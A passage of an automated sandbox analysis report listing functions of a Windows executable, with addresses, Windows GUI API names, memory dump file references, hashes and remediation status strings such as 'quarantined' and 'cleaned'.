                                                                            • Instruction Fuzzy Hash: 69F06DB2B0264606FC6F73A345563ED11824F5EBF0F904B68BB39027E6ED3C8CA20100
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140071FFC Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ClientMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 2251314529-0
                                                                            • Opcode ID: d6d7634b4d2bc64a44b6a530b55dfe517b632838eab4eb278642de79a8a7290b
                                                                            • Instruction ID: 7cdf6c8174fb422e0a07346701d3826cd4e342db7c4075a00e12e0c854004ec8
                                                                            • Opcode Fuzzy Hash: d6d7634b4d2bc64a44b6a530b55dfe517b632838eab4eb278642de79a8a7290b
                                                                            • Instruction Fuzzy Hash: 1611D63331474483EB55CB36E4987AA6761FB8CB94F044221AB8D877A4DFBCC590CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013A7B8 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRectUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 1236202516-0
                                                                            • Opcode ID: 6297357fb565d201053067b49fcce387b9f194763403fd76b5e01f2ec79161e8
                                                                            • Instruction ID: 721152671d7d099dee702780748e3a64f234c5c8fad994bc3beb61ee58a7be68
                                                                            • Opcode Fuzzy Hash: 6297357fb565d201053067b49fcce387b9f194763403fd76b5e01f2ec79161e8
                                                                            • Instruction Fuzzy Hash: 3901E572521640CAFB518F2AC44D7E93762E394F6EF580035CA090E5A4DFBB84AACB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014006E7B8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocGlobal
                                                                            • String ID: g
                                                                            • API String ID: 3761449716-30677878
                                                                            • Opcode ID: 3b214a9e221339b24b06625db0ac36d0fed0d917df989e489a95a243a305f7bd
                                                                            • Instruction ID: 4754c4fbe73149b8a4bc0dfd33578db20ea1921c944be4e8c66bd9792b3b7af7
                                                                            • Opcode Fuzzy Hash: 3b214a9e221339b24b06625db0ac36d0fed0d917df989e489a95a243a305f7bd
                                                                            • Instruction Fuzzy Hash: 99817636214B8086EB11CFA6E8443DD63A1F788BE4F089126EF5D57BA9DE38C540CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013480C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExtentPoint32Text
                                                                            • String ID:
                                                                            • API String ID: 223599850-1776720792
                                                                            • Opcode ID: ee4cc489368898e608386a95eae3c7f4bc69dae796da9b14e0f9633a3102189d
                                                                            • Instruction ID: e588983573ea3ba7b7717e96a40f28d0412b5d47479662161b8187eed76ebd11
                                                                            • Opcode Fuzzy Hash: ee4cc489368898e608386a95eae3c7f4bc69dae796da9b14e0f9633a3102189d
                                                                            • Instruction Fuzzy Hash: 31616076B106508AE714CFABD984BAD37B5F34CB88F05812ADF59A3B68DB34D841CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014010252C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersRectSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 85510744-3916222277
                                                                            • Opcode ID: aeddfa0b7b7ad5ae32ebc6d9e9d2a403fce938b88ef03a40ba89ac803b2c0fc0
                                                                            • Instruction ID: fa3e27d82427e0765bd8b0491d173857be51677edbb322bff30dd1901066b573
                                                                            • Opcode Fuzzy Hash: aeddfa0b7b7ad5ae32ebc6d9e9d2a403fce938b88ef03a40ba89ac803b2c0fc0
                                                                            • Instruction Fuzzy Hash: 0E51B0B6B0069089EB16DBA7E4987EC37A5B79CF98F184025DF0A57BA5DF74C481CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140132124 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EmptyInflate
                                                                            • String ID: $
                                                                            • API String ID: 2809357572-3993045852
                                                                            • Opcode ID: a76d352013c39924a9aa99cbbb18466f6eef7b9f438fdc6dba2cf355040b2300
                                                                            • Instruction ID: d9a8fb1fb2baaefd9fcb5955f6216a0289b8b700bc2a438a9b78e689f7a2e78e
                                                                            • Opcode Fuzzy Hash: a76d352013c39924a9aa99cbbb18466f6eef7b9f438fdc6dba2cf355040b2300
                                                                            • Instruction Fuzzy Hash: B8419B3631468582EA11EFABE9547AE7360F78DFC4F484126EF4A97B65DE78C401C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082BD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$failed
                                                                            • API String ID: 3341692771-3089831621
                                                                            • Opcode ID: 9c155582a06acc78169b66476d484f3ec0129cc3ea0c802e9b2bcc708287fe1b
                                                                            • Instruction ID: 423c179264a0ecf8a082c566edfe08755cf247106b4b41073c6bc3ee05fc6013
                                                                            • Opcode Fuzzy Hash: 9c155582a06acc78169b66476d484f3ec0129cc3ea0c802e9b2bcc708287fe1b
                                                                            • Instruction Fuzzy Hash: 7741F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082C6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$deleted
                                                                            • API String ID: 3341692771-3463592998
                                                                            • Opcode ID: 64f7e81a4bd859684b4fe9453c353bcde81c266cab922d3bcc1dd23d83d8f9c9
                                                                            • Instruction ID: a3467e48bfa044466a49f73c638a9d2a69217465896435770058cbd054f95cf2
                                                                            • Opcode Fuzzy Hash: 64f7e81a4bd859684b4fe9453c353bcde81c266cab922d3bcc1dd23d83d8f9c9
                                                                            • Instruction Fuzzy Hash: D541F772220A8096EB11EF36E8507DD2324F789BE8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082CF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$ignored
                                                                            • API String ID: 3341692771-4087165787
                                                                            • Opcode ID: d99785edc195997ddd09c7ad3e5f41bd8ead4e2d487e42c1d823f218471db799
                                                                            • Instruction ID: 6d75dbbdc5d9d9a355f58450bccbbc581fa7569f45dfb999c71cc36bff7ba728
                                                                            • Opcode Fuzzy Hash: d99785edc195997ddd09c7ad3e5f41bd8ead4e2d487e42c1d823f218471db799
                                                                            • Instruction Fuzzy Hash: BD41F772220A8096EB51EF36E8507DD2324F789BA8F805612FF5E97AE9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$quarantined
                                                                            • API String ID: 3341692771-4269031909
                                                                            • Opcode ID: 15f603d7c3c1300dba2e629123486a0d5d8b5e765606bf8fcbbfa0bb3e8725f3
                                                                            • Instruction ID: f1bf44f55d5b73bb4049c4b255d4f55bd801cef4cbe1f82414b55b50e309cc0d
                                                                            • Opcode Fuzzy Hash: 15f603d7c3c1300dba2e629123486a0d5d8b5e765606bf8fcbbfa0bb3e8725f3
                                                                            • Instruction Fuzzy Hash: 6F41F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082E1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$reportonly
                                                                            • API String ID: 3341692771-1437454803
                                                                            • Opcode ID: 1b9706d41bddfffa8b6be299cf9523416fe9a7202414131f9721e1b3db16a9f3
                                                                            • Instruction ID: 69370e95d4afdabca69a2a429675b89123bbbf2bdae1615990ad26fe133f8fdd
                                                                            • Opcode Fuzzy Hash: 1b9706d41bddfffa8b6be299cf9523416fe9a7202414131f9721e1b3db16a9f3
                                                                            • Instruction Fuzzy Hash: 0641F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082EA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$ignorealways
                                                                            • API String ID: 3341692771-623253409
                                                                            • Opcode ID: d5b257b082d482840a8c7d431b2f4d04db9976b30eb0ce12dd0e934ed85cc4d3
                                                                            • Instruction ID: b177a3712e17a1bc2e1cf31016a2fbb536159994969f4336b60cb4bf6f13f032
                                                                            • Opcode Fuzzy Hash: d5b257b082d482840a8c7d431b2f4d04db9976b30eb0ce12dd0e934ed85cc4d3
                                                                            • Instruction Fuzzy Hash: A141F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400082F3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$cleaned
                                                                            • API String ID: 3341692771-3206119648
                                                                            • Opcode ID: c689a4940d5987144721a91bced242f68ab56f2156460ef2cab1a8c63ccb6a8c
                                                                            • Instruction ID: e0c5833f1891fa55e7fe1ff9dd8ff0c7a6775a61658ef99e0eb8e04631aa9a82
                                                                            • Opcode Fuzzy Hash: c689a4940d5987144721a91bced242f68ab56f2156460ef2cab1a8c63ccb6a8c
                                                                            • Instruction Fuzzy Hash: 0441F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400882A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0000000140049910: GetWindowDC.USER32(?,?,?,?,?,0000000140075E90), ref: 000000014004994F
                                                                            • GetWindowRect.USER32 ref: 00000001400882E2
                                                                              • Part of subcall function 000000014003A82C: GetWindowLongW.USER32 ref: 000000014003A849
                                                                            • InflateRect.USER32 ref: 0000000140088377
                                                                              • Part of subcall function 0000000140075108: VerSetConditionMask.KERNEL32 ref: 0000000140075163
                                                                              • Part of subcall function 0000000140075108: VerSetConditionMask.KERNEL32 ref: 0000000140075174
                                                                              • Part of subcall function 0000000140075108: VerifyVersionInfoW.KERNEL32 ref: 0000000140075187
                                                                              • Part of subcall function 0000000140075108: GetSystemMetrics.USER32 ref: 0000000140075198
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ConditionMaskRect$InflateInfoLongMetricsSystemVerifyVersion
                                                                            • String ID: iii
                                                                            • API String ID: 2584581174-940974255
                                                                            • Opcode ID: c25988b43402036ca6170c72cacf7253d90af9ca652de3852f8d1ecd9b5f0eea
                                                                            • Instruction ID: b7a81dce4a814047c8ba9c47b80535a8816eee96211b42252883cbf6b30ba4b5
                                                                            • Opcode Fuzzy Hash: c25988b43402036ca6170c72cacf7253d90af9ca652de3852f8d1ecd9b5f0eea
                                                                            • Instruction Fuzzy Hash: F6313832F10A0099FB12DB66E8597EC3770B75C7A9F800219EF1867AF5DBB8C9858744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400026C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
